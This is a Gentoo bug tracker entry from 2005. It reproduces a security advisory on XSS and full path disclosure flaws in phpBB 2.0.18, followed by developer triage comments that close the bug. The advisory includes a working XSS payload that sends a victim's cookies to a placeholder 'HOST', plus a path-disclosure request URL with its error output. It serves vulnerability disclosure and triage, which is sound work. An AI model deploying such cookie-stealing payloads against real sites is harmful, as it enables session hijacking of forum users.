Bug 115908

Summary:	www-apps/phpBB Possible several issues
Product:	Gentoo Security	Reporter:	Sune Kloppenborg Jeppesen (RETIRED) <jaervosz>
Component:	Vulnerabilities	Assignee:	Gentoo Security <security>
Status:	RESOLVED WONTFIX
Severity:	trivial	CC:	grimmlin, web-apps
Priority:	High
Version:	unspecified
Hardware:	All
OS:	Linux
URL:	http://archives.neohapsis.com/archives/fulldisclosure/2005-12/0829.html
Whiteboard:	~4 [?]
Package list:		Runtime testing required:	---

Description Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev

2005-12-17 23:11:44 UTC

Filing this for the forum devs.

[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from securityreason.com TEAM

--- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source
bulletin board package. phpBB has a user-friendly interface, simple and
straightforward administration panel, and helpful FAQ. Based on the powerful
PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or
Access/ODBC database servers, phpBB is the ideal free community solution for
all web sites.
Contact with author http://www.phpbb.com/about.php.

--- 1. XSS ---
If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile
"Always allow HTML: YES" or are you Guest

that you can use this tags:

<B C=">" onmouseover="alert('SecurityReason.Com')" X="<B "> H E L O </B>

Exploit:

<B C=">"
onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)"
X="<B "> H A L O </B>

and have you cookies.

--- 2. Full Path Disclosure ---
In file admin/admin_disallow.php is

-25-31---
if( !empty($setmodules) )
{
        $filename = basename(__FILE__);
        $module['Users']['Disallow'] = append_sid($filename);

        return;
}
-25-31---

function append_sid() dosen't exists. And if you have:

register_globals = On
display_errors = On

Try to go:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1

-RESULT ERROR---
Fatal error: Call to undefined function: append_sid()
in /www/2018/phpBB2/admin/admin_disallow.php on line 28
-RESULT ERROR---

Comment 1 Tom Knight (RETIRED) gentoo-dev

2005-12-18 02:20:21 UTC

Our forums aren't affected by this as we have both HTML and register_globals switched off.

Comment 2 Thierry Carrez (RETIRED) gentoo-dev

2005-12-18 03:06:05 UTC

This looks very limited.
- XSS if Allowed HTML tags is set to "ON"
- Path disclosure if PHP has register_globals = On and display_errors = On

Those are non-standard settings... Closing this one, feel free to reopen if phpBB releases a new version.

Comment 3 Jakub Moc (RETIRED) gentoo-dev

2006-01-03 02:12:28 UTC

*** Bug 117560 has been marked as a duplicate of this bug. ***

Comment 4 Jakub Moc (RETIRED) gentoo-dev

2006-01-03 02:13:15 UTC

2.0.19 is out, if you want to revisit this.

Comment 5 Thierry Carrez (RETIRED) gentoo-dev

2006-01-03 02:29:30 UTC

Well, phpBB is still security-masked as a semi-permanent security PITA so no, I don't want to revisit this. However www-apps can still bump it to 2.0.19 if they want to, since lots of users security_unmask the thing and accept the risk.

Comment 6 Renat Lumpau (RETIRED) gentoo-dev

2006-01-03 03:12:14 UTC

2.0.19 in CVS, just FYI